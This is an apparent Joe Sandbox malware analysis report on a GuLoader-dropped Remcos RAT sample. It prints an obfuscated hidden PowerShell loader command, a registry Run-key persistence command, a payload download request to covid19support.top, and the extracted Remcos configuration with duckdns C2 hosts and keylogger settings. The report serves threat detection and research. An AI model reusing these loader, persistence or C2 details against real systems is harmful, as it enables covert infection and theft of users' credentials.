Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Evgh. rvs Armenia. 30.04.2024.exe

Overview

General Information

Sample name:Evgh. rvs Armenia. 30.04.2024.exe
Analysis ID:1435147
MD5:6775321bbbe02737daff72cbfef1d3a5
SHA1:778fb1443b71b7afbf8965d6fad12247c7e2befc
SHA256:0d8b7479bd9156032cf3287faee1807e96d68c7bce3835c7e3435951446bade1
Tags:exe
Infos:

Detection

GuLoader, Remcos
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected GuLoader
Yara detected Remcos RAT
C2 URLs / IPs found in malware configuration
Found suspicious powershell code related to unpacking or dynamic code loading
Installs a global keyboard hook
Maps a DLL or memory area into another process
Obfuscated command line found
Powershell drops PE file
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: Wab/Wabmig Unusual Parent Or Child Processes
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Instant Messenger accounts or passwords
Tries to steal Mail credentials (via file / registry access)
Tries to steal Mail credentials (via file registry)
Uses dynamic DNS services
Writes to foreign memory regions
Yara detected WebBrowserPassView password recovery tool
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to dynamically determine API calls
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Direct Autorun Keys Modification
Sigma detected: Potential Dosfuscation Activity
Sigma detected: Potential Persistence Attempt Via Run Keys Using Reg.EXE
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

  • System is w10x64
  • Evgh. rvs Armenia. 30.04.2024.exe (PID: 4284 cmdline: "C:\Users\user\Desktop\Evgh. rvs Armenia. 30.04.2024.exe" MD5: 6775321BBBE02737DAFF72CBFEF1D3A5)
    • powershell.exe (PID: 7160 cmdline: "powershell.exe" -windowstyle hidden "$Unlovingness=Get-Content 'C:\Users\user\AppData\Local\Temp\Deinotherium\Attn104\Jiber\Superintendentens\Chaptaliseringernes.Kro';$Polymer=$Unlovingness.SubString(60937,3);.$Polymer($Unlovingness)" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 2608 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 3580 cmdline: "C:\Windows\system32\cmd.exe" "/c set /A 1^^0" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • wab.exe (PID: 3424 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
        • cmd.exe (PID: 4512 cmdline: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Ufuldbaarnes% -windowstyle minimized $Nonconjecturably=(Get-ItemProperty -Path 'HKCU:\Nausea\').Wryer;%Ufuldbaarnes% ($Nonconjecturably)" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 6612 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • reg.exe (PID: 1716 cmdline: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Ufuldbaarnes% -windowstyle minimized $Nonconjecturably=(Get-ItemProperty -Path 'HKCU:\Nausea\').Wryer;%Ufuldbaarnes% ($Nonconjecturably)" MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
        • wab.exe (PID: 6324 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\gyjlretajhvbzkpgzfenpklwvjfw" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
        • wab.exe (PID: 6292 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\qbovkwdcxqngjydkiqrgaxffwqwfffq" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
        • wab.exe (PID: 2656 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\bvuokpowlyflmeroabeidcawfegogqpwfc" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
NameDescriptionAttributionBlogpost URLsLink
Remcos, RemcosRATRemcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.
  • APT33
  • The Gorgon Group
  • UAC-0050
https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos
{"Host:Port:Password": "learfo55ozj01.duckdns.org:29871:0learfo55ozj01.duckdns.org:29872:1learfo55ozj02.duckdns.org:29872:1", "Assigned name": "Top", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "alpwovnb-G3F5OR", "Keylog flag": "1", "Keylog path": "AppData", "Keylog file": "mqerms.dat", "Keylog crypt": "Disable", "Hide keylog file": "Enable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}
SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Roaming\mqerms.datJoeSecurity_RemcosYara detected Remcos RATJoe Security
    SourceRuleDescriptionAuthorStrings
    00000007.00000002.3256333673.0000000007B04000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
      00000002.00000002.2984184609.0000000009CB6000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
        Process Memory Space: wab.exe PID: 3424JoeSecurity_WebBrowserPassViewYara detected WebBrowserPassView password recovery toolJoe Security
          Process Memory Space: wab.exe PID: 3424JoeSecurity_RemcosYara detected Remcos RATJoe Security
            Process Memory Space: wab.exe PID: 6324JoeSecurity_WebBrowserPassViewYara detected WebBrowserPassView password recovery toolJoe Security

              System Summary

              barindex
              Source: Process startedAuthor: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: "powershell.exe" -windowstyle hidden "$Unlovingness=Get-Content 'C:\Users\user\AppData\Local\Temp\Deinotherium\Attn104\Jiber\Superintendentens\Chaptaliseringernes.Kro';$Polymer=$Unlovingness.SubString(60937,3);.$Polymer($Unlovingness)", CommandLine: "powershell.exe" -windowstyle hidden "$Unlovingness=Get-Content 'C:\Users\user\AppData\Local\Temp\Deinotherium\Attn104\Jiber\Superintendentens\Chaptaliseringernes.Kro';$Polymer=$Unlovingness.SubString(60937,3);.$Polymer($Unlovingness)", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Evgh. rvs Armenia. 30.04.2024.exe", ParentImage: C:\Users\user\Desktop\Evgh. rvs Armenia. 30.04.2024.exe, ParentProcessId: 4284, ParentProcessName: Evgh. rvs Armenia. 30.04.2024.exe, ProcessCommandLine: "powershell.exe" -windowstyle hidden "$Unlovingness=Get-Content 'C:\Users\user\AppData\Local\Temp\Deinotherium\Attn104\Jiber\Superintendentens\Chaptaliseringernes.Kro';$Polymer=$Unlovingness.SubString(60937,3);.$Polymer($Unlovingness)", ProcessId: 7160, ProcessName: powershell.exe
              Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Ufuldbaarnes% -windowstyle minimized $Nonconjecturably=(Get-ItemProperty -Path 'HKCU:\Nausea\').Wryer;%Ufuldbaarnes% ($Nonconjecturably)", CommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Ufuldbaarnes% -windowstyle minimized $Nonconjecturably=(Get-ItemProperty -Path 'HKCU:\Nausea\').Wryer;%Ufuldbaarnes% ($Nonconjecturably)", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Program Files (x86)\windows mail\wab.exe", ParentImage: C:\Program Files (x86)\Windows Mail\wab.exe, ParentProcessId: 3424, ParentProcessName: wab.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Ufuldbaarnes% -windowstyle minimized $Nonconjecturably=(Get-ItemProperty -Path 'HKCU:\Nausea\').Wryer;%Ufuldbaarnes% ($Nonconjecturably)", ProcessId: 4512, ProcessName: cmd.exe
              Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: %Ufuldbaarnes% -windowstyle minimized $Nonconjecturably=(Get-ItemProperty -Path 'HKCU:\Nausea\').Wryer;%Ufuldbaarnes% ($Nonconjecturably), EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\reg.exe, ProcessId: 1716, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Startup key
              Source: Process startedAuthor: Victor Sergeev, Daniil Yugoslavskiy, oscd.community: Data: Command: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Ufuldbaarnes% -windowstyle minimized $Nonconjecturably=(Get-ItemProperty -Path 'HKCU:\Nausea\').Wryer;%Ufuldbaarnes% ($Nonconjecturably)", CommandLine: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Ufuldbaarnes% -windowstyle minimized $Nonconjecturably=(Get-ItemProperty -Path 'HKCU:\Nausea\').Wryer;%Ufuldbaarnes% ($Nonconjecturably)", CommandLine|base64offset|contains: DA, Image: C:\Windows\SysWOW64\reg.exe, NewProcessName: C:\Windows\SysWOW64\reg.exe, OriginalFileName: C:\Windows\SysWOW64\reg.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Ufuldbaarnes% -windowstyle minimized $Nonconjecturably=(Get-ItemProperty -Path 'HKCU:\Nausea\').Wryer;%Ufuldbaarnes% ($Nonconjecturably)", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 4512, ParentProcessName: cmd.exe, ProcessCommandLine: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Ufuldbaarnes% -windowstyle minimized $Nonconjecturably=(Get-ItemProperty -Path 'HKCU:\Nausea\').Wryer;%Ufuldbaarnes% ($Nonconjecturably)", ProcessId: 1716, ProcessName: reg.exe
              Source: Process startedAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\system32\cmd.exe" "/c set /A 1^^0", CommandLine: "C:\Windows\system32\cmd.exe" "/c set /A 1^^0", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "powershell.exe" -windowstyle hidden "$Unlovingness=Get-Content 'C:\Users\user\AppData\Local\Temp\Deinotherium\Attn104\Jiber\Superintendentens\Chaptaliseringernes.Kro';$Polymer=$Unlovingness.SubString(60937,3);.$Polymer($Unlovingness)", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7160, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\system32\cmd.exe" "/c set /A 1^^0", ProcessId: 3580, ProcessName: cmd.exe
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Ufuldbaarnes% -windowstyle minimized $Nonconjecturably=(Get-ItemProperty -Path 'HKCU:\Nausea\').Wryer;%Ufuldbaarnes% ($Nonconjecturably)", CommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Ufuldbaarnes% -windowstyle minimized $Nonconjecturably=(Get-ItemProperty -Path 'HKCU:\Nausea\').Wryer;%Ufuldbaarnes% ($Nonconjecturably)", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Program Files (x86)\windows mail\wab.exe", ParentImage: C:\Program Files (x86)\Windows Mail\wab.exe, ParentProcessId: 3424, ParentProcessName: wab.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Ufuldbaarnes% -windowstyle minimized $Nonconjecturably=(Get-ItemProperty -Path 'HKCU:\Nausea\').Wryer;%Ufuldbaarnes% ($Nonconjecturably)", ProcessId: 4512, ProcessName: cmd.exe
              Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "powershell.exe" -windowstyle hidden "$Unlovingness=Get-Content 'C:\Users\user\AppData\Local\Temp\Deinotherium\Attn104\Jiber\Superintendentens\Chaptaliseringernes.Kro';$Polymer=$Unlovingness.SubString(60937,3);.$Polymer($Unlovingness)", CommandLine: "powershell.exe" -windowstyle hidden "$Unlovingness=Get-Content 'C:\Users\user\AppData\Local\Temp\Deinotherium\Attn104\Jiber\Superintendentens\Chaptaliseringernes.Kro';$Polymer=$Unlovingness.SubString(60937,3);.$Polymer($Unlovingness)", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Evgh. rvs Armenia. 30.04.2024.exe", ParentImage: C:\Users\user\Desktop\Evgh. rvs Armenia. 30.04.2024.exe, ParentProcessId: 4284, ParentProcessName: Evgh. rvs Armenia. 30.04.2024.exe, ProcessCommandLine: "powershell.exe" -windowstyle hidden "$Unlovingness=Get-Content 'C:\Users\user\AppData\Local\Temp\Deinotherium\Attn104\Jiber\Superintendentens\Chaptaliseringernes.Kro';$Polymer=$Unlovingness.SubString(60937,3);.$Polymer($Unlovingness)", ProcessId: 7160, ProcessName: powershell.exe
              Timestamp:05/02/24-08:04:32.328165
              SID:2032776
              Source Port:49713
              Destination Port:29871
              Protocol:TCP
              Classtype:A Network Trojan was detected

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Source: http://pesterbdd.com/images/Pester.pngURL Reputation: Label: malware
              Source: http://geoplugin.net/json.gpURL Reputation: Label: phishing
              Source: learfo55ozj01.duckdns.orgAvira URL Cloud: Label: malware
              Source: 00000007.00000002.3256333673.0000000007B04000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: Remcos {"Host:Port:Password": "learfo55ozj01.duckdns.org:29871:0learfo55ozj01.duckdns.org:29872:1learfo55ozj02.duckdns.org:29872:1", "Assigned name": "Top", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "alpwovnb-G3F5OR", "Keylog flag": "1", "Keylog path": "AppData", "Keylog file": "mqerms.dat", "Keylog crypt": "Disable", "Hide keylog file": "Enable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}
              Source: covid19support.topVirustotal: Detection: 8%Perma Link
              Source: C:\Users\user\AppData\Local\Temp\Deinotherium\Anstalters\Faulty\Smallhearted115\Kommuneskatten\Evgh. rvs Armenia. 30.04.2024.exeReversingLabs: Detection: 31%
              Source: Evgh. rvs Armenia. 30.04.2024.exeReversingLabs: Detection: 31%
              Source: Evgh. rvs Armenia. 30.04.2024.exeVirustotal: Detection: 54%Perma Link
              Source: Yara matchFile source: 00000007.00000002.3256333673.0000000007B04000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: wab.exe PID: 3424, type: MEMORYSTR
              Source: Yara matchFile source: C:\Users\user\AppData\Roaming\mqerms.dat, type: DROPPED
              Source: Evgh. rvs Armenia. 30.04.2024.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
              Source: unknownHTTPS traffic detected: 172.67.220.6:443 -> 192.168.2.5:49712 version: TLS 1.2
              Source: Evgh. rvs Armenia. 30.04.2024.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
              Source: Binary string: \??\C:\Windows\symbols\dll\System.Core.pdb source: powershell.exe, 00000002.00000002.2983515587.00000000088BA000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000002.00000002.2983515587.00000000088BA000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb5 source: powershell.exe, 00000002.00000002.2977567691.0000000007770000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: TA.pdb source: powershell.exe, 00000002.00000002.2977567691.00000000076B0000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: System.Core.pdb source: powershell.exe, 00000002.00000002.2977567691.00000000076B0000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: System.Core.pdbk source: powershell.exe, 00000002.00000002.2977567691.00000000076B0000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb source: powershell.exe, 00000002.00000002.2977567691.0000000007770000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: System.Core.pdbl source: powershell.exe, 00000002.00000002.2983515587.00000000088D2000.00000004.00000020.00020000.00000000.sdmp
              Source: C:\Users\user\Desktop\Evgh. rvs Armenia. 30.04.2024.exeCode function: 0_2_00406001 FindFirstFileA,FindClose,0_2_00406001
              Source: C:\Users\user\Desktop\Evgh. rvs Armenia. 30.04.2024.exeCode function: 0_2_00402688 FindFirstFileA,0_2_00402688
              Source: C:\Users\user\Desktop\Evgh. rvs Armenia. 30.04.2024.exeCode function: 0_2_0040559F GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,0_2_0040559F
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 7_2_236610F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,7_2_236610F1
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 7_2_23666580 FindFirstFileExA,7_2_23666580
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_0040AE51 FindFirstFileW,FindNextFileW,11_2_0040AE51
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,12_2_00407EF8
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,13_2_00407898
              Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\Deinotherium\Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\Deinotherium\Anstalters\Jump to behavior

              Networking

              barindex
              Source: TrafficSnort IDS: 2032776 ET TROJAN Remcos 3.x Unencrypted Checkin 192.168.2.5:49713 -> 192.169.69.26:29871
              Source: Malware configuration extractorURLs: learfo55ozj01.duckdns.org
              Source: unknownDNS query: name: learfo55ozj02.duckdns.org
              Source: unknownDNS query: name: learfo55ozj01.duckdns.org
              Source: global trafficTCP traffic: 192.168.2.5:49715 -> 193.222.96.21:29872
              Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
              Source: Joe Sandbox ViewIP Address: 178.237.33.50 178.237.33.50
              Source: Joe Sandbox ViewIP Address: 192.169.69.26 192.169.69.26
              Source: Joe Sandbox ViewIP Address: 192.169.69.26 192.169.69.26
              Source: Joe Sandbox ViewASN Name: WOWUS WOWUS
              Source: Joe Sandbox ViewASN Name: SWISSCOMSwisscomSwitzerlandLtdCH SWISSCOMSwisscomSwitzerlandLtdCH
              Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
              Source: global trafficHTTP traffic detected: GET /OXdwhUAIa249.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: covid19support.topCache-Control: no-cache
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: global trafficHTTP traffic detected: GET /OXdwhUAIa249.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: covid19support.topCache-Control: no-cache
              Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
              Source: wab.exe, 0000000B.00000002.3089953411.0000000003469000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000B.00000003.3081516854.0000000003469000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: :///C:/Windows/system32/oobe/FirstLogonAnim.htmlhttps://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com::MBI_SSL&response_type=token&display=windesktop&theme=win7&lc=2057&redirect_uri=https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srf?lc=1033https://login.live.com/oauth20_desktop.srfms-settings:networkfile://192.168.2.1/all/install/setup.au3https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login, equals www.facebook.com (Facebook)
              Source: wab.exe, 0000000B.00000002.3089953411.0000000003469000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000B.00000003.3081516854.0000000003469000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: :///C:/Windows/system32/oobe/FirstLogonAnim.htmlhttps://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com::MBI_SSL&response_type=token&display=windesktop&theme=win7&lc=2057&redirect_uri=https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srf?lc=1033https://login.live.com/oauth20_desktop.srfms-settings:networkfile://192.168.2.1/all/install/setup.au3https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login, equals www.yahoo.com (Yahoo)
              Source: wab.exe, 00000007.00000002.3267844230.0000000023630000.00000040.10000000.00040000.00000000.sdmp, wab.exe, 0000000D.00000002.3048930801.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: Software\America Online\AOL Instant Messenger (TM)\CurrentVersion\Users%s\Loginprpl-msnprpl-yahooprpl-jabberprpl-novellprpl-oscarprpl-ggprpl-ircaccounts.xmlaimaim_1icqicq_1jabberjabber_1msnmsn_1yahoogggg_1http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com equals www.ebuddy.com (eBuggy)
              Source: wab.exe, wab.exe, 0000000D.00000002.3048930801.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.ebuddy.com equals www.ebuddy.com (eBuggy)
              Source: wab.exeString found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)
              Source: wab.exe, 00000007.00000002.3268081079.0000000023EB0000.00000040.10000000.00040000.00000000.sdmp, wab.exe, 0000000B.00000002.3089029097.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.facebook.com (Facebook)
              Source: wab.exe, 00000007.00000002.3268081079.0000000023EB0000.00000040.10000000.00040000.00000000.sdmp, wab.exe, 0000000B.00000002.3089029097.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.yahoo.com (Yahoo)
              Source: global trafficDNS traffic detected: DNS query: covid19support.top
              Source: global trafficDNS traffic detected: DNS query: learfo55ozj01.duckdns.org
              Source: global trafficDNS traffic detected: DNS query: learfo55ozj02.duckdns.org
              Source: global trafficDNS traffic detected: DNS query: geoplugin.net
              Source: bhv9CF8.tmp.11.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
              Source: bhv9CF8.tmp.11.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0B
              Source: powershell.exe, 00000002.00000002.2955080970.00000000030C5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micro
              Source: powershell.exe, 00000002.00000002.2977567691.0000000007721000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micro-
              Source: bhv9CF8.tmp.11.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl0
